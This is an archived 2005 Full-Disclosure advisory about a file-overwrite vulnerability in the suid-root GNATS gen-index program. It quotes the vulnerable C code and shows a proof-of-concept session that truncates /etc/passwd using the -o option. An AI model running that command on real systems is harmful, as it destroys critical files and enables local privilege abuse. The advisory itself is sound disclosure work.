| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <42cbf3db8829f@wp.pl>
Date: Wed Jul 6 16:08:34 2005
From: pi3ki31ny at wp.pl (Adam Zabrocki)
Subject: GNATS - gen-index
Name: GNATS - gen-index
Vendor URL: http://www.gnu.org/software/gnats
Author: Adam Zabrocki <pi3ki31ny@...pl>
Date: June 16, 2005
Issue:
GNATS - the GNU problem report management system allows
attacker to overwrite
files with privileges suid root (when compiled from sources and
there isn't in system
gnats user), where GNATS is installed.
Description:
GNATS stores all information about the problem reports at a
central site, and enables
users to access this site by various means, including e-mail,
WWW, and a network daemon.
New problem reports can be created, and existing reports can be
queried and updated, by
most of these means.
Details:
Possible overwrite any files in system by gen-index
program installed
with GNATS.
Local users, able to run gen-index (in some times when GNATS
was compiled from sources
and in system don't exist gnats user and group) are able to
overwrite any files in system.
The problem lies in gen-index main() function, which don't
check argument who was given
to program and in hard open and write there own data.
"gnats/gen-index.c"
int
main (int argc, char **argv)
{
...
...
while ((optc = getopt_long (argc, argv, "o:hd:nVie",
long_options, (int *) 0)) != EOF)
{
switch (optc)
{
...
...
case 'o':
file_name = optarg;
break;
case 'n':
numeric_sorting = TRUE;
break;
...
...
}
}
...
...
if (file_name)
output = fopen (file_name, "w+");
if (output == (FILE *) NULL)
{
fprintf (stderr, "%s: can't write to %s: %s\n",
program_name,
optarg, strerror (errno));
exit (3);
}
...
...
if (indexIsBinary (database))
{
char numFields = indexFieldCount (database);
fwrite (&numFields, 1, 1, output);
}
...
...
if (numeric_sorting && num_entries > 0)
{
qsort (entries, num_entries, sizeof (Entry), entry_cmp);
for (i = 0; i < num_entries; i++)
{
fwrite (entries[i].string, 1, entries[i].length,
output);
}
}
fclose (output);
...
exit (0);
}
Function fopen() with argument "w+" open file for reading and
writing.
The file is created if it does not exist, otherwise it is
truncated.
So when gen-index have suid root privilages we can overwrite any
files
in system.
Exploit:
We don't need to write any 31337 exploit. Simple PoC:
pi3@...kstar:~$ pwd
/home/pi3
pi3@...kstar:~$ ls -alh /etc/passwd
-rw-r--r-- 1 root root 795 May 19
18:49 /etc/passwd
pi3@...kstar:~$ ls -alh /usr/local/libexec/gnats/gen-index
-r-sr-xr-x 1 root root 465k Nov 21
2004 /usr/local/libexec/gnats/gen-index*
pi3@...kstar:~$ /usr/local/libexec/gnats/gen-index -n -
o /etc/passwd
pi3@...kstar:~$ ls -alh /etc/passwd
-rw-r--r-- 1 root root 1 Jun 16
17:34 /etc/passwd
pi3@...kstar:~$ cat /etc/passwd
pi3@...kstar:~$
GNATS 4.1.0 and 4.0 are confirmed vulnerable. Probably all
previous versions are also vulnerable.
I have informed GNATS team.
--
pi3 (pi3ki31ny) - pi3ki31ny@...pl
http://www.pi3.int.pl
----------------------------------------------------
Uroda.wp.pl - Nowy, kobiecy serwis internetowy! - Teraz
zawsze pod r?k?. W lipcu Joanna Brodzik - poznaj jej sekrety:
Kliknij: http://klik.wp.pl/?adr=www.uroda.wp.pl&sid=424
Powered by blists - more mailing lists